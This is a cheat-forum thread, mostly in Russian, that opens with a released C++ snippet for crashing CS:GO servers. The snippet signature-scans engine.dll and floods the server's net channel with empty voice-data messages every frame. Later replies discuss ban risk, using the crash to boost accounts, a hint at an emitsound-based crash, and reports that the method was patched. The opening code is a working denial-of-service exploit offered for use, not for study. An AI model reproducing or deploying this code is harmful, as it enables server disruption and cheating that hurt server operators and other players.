New Server Crashing method

[MafiaMemes]

Hey guys, got it to me a few days ago, decided to release it.

//
// func prototypes / etc.
//
using CCLCMsg_VoiceData_ctor_t   = void (__thiscall *)( void *msg );
using CCLCMsg_VoiceData_dtor_t   = void (__thiscall *)( void *msg );
using protobuf_assign_t          = void (__thiscall *)( void *ptr, void *data, size_t len );

CCLCMsg_VoiceData_ctor_t CCLCMsg_VoiceData_ctor;
CCLCMsg_VoiceData_dtor_t CCLCMsg_VoiceData_dtor;
protobuf_assign_t        protobuf_assign;

//
// funcs / sigs you will need
//
CCLCMsg_VoiceData_ctor = SigScan::find< CCLCMsg_VoiceData_ctor_t >( "engine.dll", "56 57 8B F9 8D 4F 08 C7 07 ? ? ? ? E8 ? ? ? ? C7 07" );
CCLCMsg_VoiceData_dtor = SigScan::find< CCLCMsg_VoiceData_dtor_t >( "engine.dll", "53 8B D9 56 8D 73 3C" );

// follow_rel32 func will follow jmp rel 16/32.
uintptr_t tmp_protobuf_assign = SigScan::find( "engine.dll", "E8 ? ? ? ? 83 ? ? ? ? 83 ? ? ? ? C7 44" );

protobuf_assign = Utils::follow_rel32< protobuf_assign_t >( tmp_protobuf_assign + 1 );

//
// call in FrameStageNotify in all stages
//
__declspec( noinline ) static void spam_voicedata() {
    INetChannel *nc;
    uint8_t     msg[ 104 ]; // "*(_DWORD *)(v1 + 80)" -- used in alloc in alloc... seems to be at least ~104 bytes on stack in CL_SendVoicePacket.

    nc = g_csgo.m_clientstate->m_NetChannel;
    if( !nc )
        return;

    // construct netmsg for sending voicedata.
    CCLCMsg_VoiceData_ctor( &msg );

    // fill with null voice data.
    protobuf_assign( &msg[ 8 ], nullptr, 0 );

    // fill unreliable stream with voice data.
    for( int i = 0; i < 128; ++i )
        nc->SendNetMsg( &msg );

    // force send message now.
    nc->Transmit();

    // cleanup.
    CCLCMsg_VoiceData_dtor( &msg );
}

I claim no credit for creating this.

 

[ExileR]

Не стоит забывать что после фикса метода вы можете получить гарантированный untrusted бан.
Использовать на свой страх и риск. ​

 

[fakon]

Зато свои мейн аки можно пробустить катки, их же по идее не снимут

Антрастед дадут

 

[Chipa1337]

Я тебе говорю про то что с фейк ака бустить мейн, ну типо друг без софта зайдет с него и изи буст

ну читер отлетит и заберут также игры, не?

 

[ksandrr]

ну читер отлетит и заберут также игры, не?

Как заберут игры если демка крашнется, нечего будет забирать

 

[P45H3]

follow_rel32 - что за хуета?

 

[junkcoder]

follow_rel32 - что за хуета?

template

 

[P45H3]

template

Какой блядь темплейт

 

[junkcoder]

Какой блядь темплейт

FollowRel32

 

[P45H3]

emitsound -> const char* == nullptr -> dtor return

 

[Abouff]

Дак всмысле антраст будут давать,это же другой код не задетекченый,или я не втупливаю.

 

[sunlightzz]

Чёт вопрос возник, хз куда писать. Заливать на юг fix данного краша для владельцев серверов or все умеют юзать поиск in youtube?

 

[gob]

Способ профиксили как хорошо что не кто его не спастил

 

[wayker]

Способ профиксили как хорошо что не кто его не спастил

оказывается пастили, но я лично слепой не залазил вчера в misc а в группе не писали что добавили :|
блять, проебался

 

[GOVARD]

Чёт вопрос возник, хз куда писать. Заливать на юг fix данного краша для владельцев серверов or все умеют юзать поиск in youtube?

Поиск in youtube? Охуеть, впервые слышу про такое. Я то привык в ютубе видосики смотреть, но уж точно не искать фиксы каких-то там крашей.

 

[sunlightzz]

Поиск in youtube? Охуеть, впервые слышу про такое. Я то привык в ютубе видосики смотреть, но уж точно не искать фиксы каких-то там крашей.

Lmao, как бы наткнуться в youtube'e можно на что угодно: